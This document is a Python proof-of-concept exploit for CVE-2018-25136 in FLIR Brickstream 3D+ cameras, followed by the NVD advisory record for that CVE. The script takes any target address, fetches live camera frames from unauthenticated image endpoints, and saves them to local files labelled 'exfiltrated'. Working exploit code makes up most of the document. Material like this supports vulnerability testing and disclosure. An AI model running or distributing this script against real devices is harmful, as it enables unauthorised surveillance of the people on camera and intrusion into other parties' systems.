CVE-2018-25136

#!/usr/bin/env python3 # CVE-2018-25136 PoC - FLIR Brickstream 3D+ Unauthenticated Video Stream Access # This PoC demonstrates the vulnerability that allows remote attackers to access # live video streams without credentials. import requests import sys import argparse def check_vulnerability(target_ip, target_port=80): """Check if target is vulnerable to CVE-2018-25136""" base_url = f"http://{target_ip}:{target_port}" # Image endpoints that can be accessed without authentication endpoints = [ "/middleImage.jpg", "/rightimage.jpg", "/leftimage.jpg", "/stream.jpg" ] print(f"[*] Testing target: {base_url}") print(f"[*] CVE-2018-25136 - FLIR Brickstream Unauthenticated Access\n") vulnerable = False for endpoint in endpoints: try: url = base_url + endpoint print(f"[*] Testing endpoint: {endpoint}") response = requests.get(url, timeout=10) if response.status_code == 200: content_type = response.headers.get('Content-Type', '') content_length = len(response.content) if 'image' in content_type or response.content[:3] == b'\xff\xd8\xff': print(f"[+] VULNERABLE! Endpoint {endpoint} returned image data") print(f" Content-Type: {content_type}") print(f" Size: {content_length} bytes") # Save the image filename = f"exfiltrated_{endpoint.replace('/', '')}" with open(filename, 'wb') as f: f.write(response.content) print(f" Saved to: {filename}") vulnerable = True else: print(f"[-] Endpoint accessible but no image data returned") elif response.status_code == 401: print(f"[-] Endpoint requires authentication") else: print(f"[-] Endpoint returned status code: {response.status_code}") except requests.exceptions.Timeout: print(f"[-] Request timeout for {endpoint}") except requests.exceptions.ConnectionError: print(f"[-] Connection error for {endpoint}") except Exception as e: print(f"[-] Error testing {endpoint}: {str(e)}") return vulnerable def main(): parser = argparse.ArgumentParser(description='CVE-2018-25136 PoC') parser.add_argument('target', help='Target IP address or hostname') parser.add_argument('-p', '--port', type=int, default=80, help='Target port (default: 80)') args = parser.parse_args() if check_vulnerability(args.target, args.port): print("\n[!] Target is VULNERABLE to CVE-2018-25136") print("[!] Attackers can access live video streams without authentication") sys.exit(1) else: print("\n[-] Target appears to be patched or not vulnerable") sys.exit(0) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2018-25136", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:47.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FLIR Brickstream 3D+ 2.1.742.1842 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can retrieve video stream images by directly accessing multiple image endpoints like middleImage.jpg, rightimage.jpg, and leftimage.jpg."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "http://www.brickstream.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45607", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5496.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45607", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5496.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}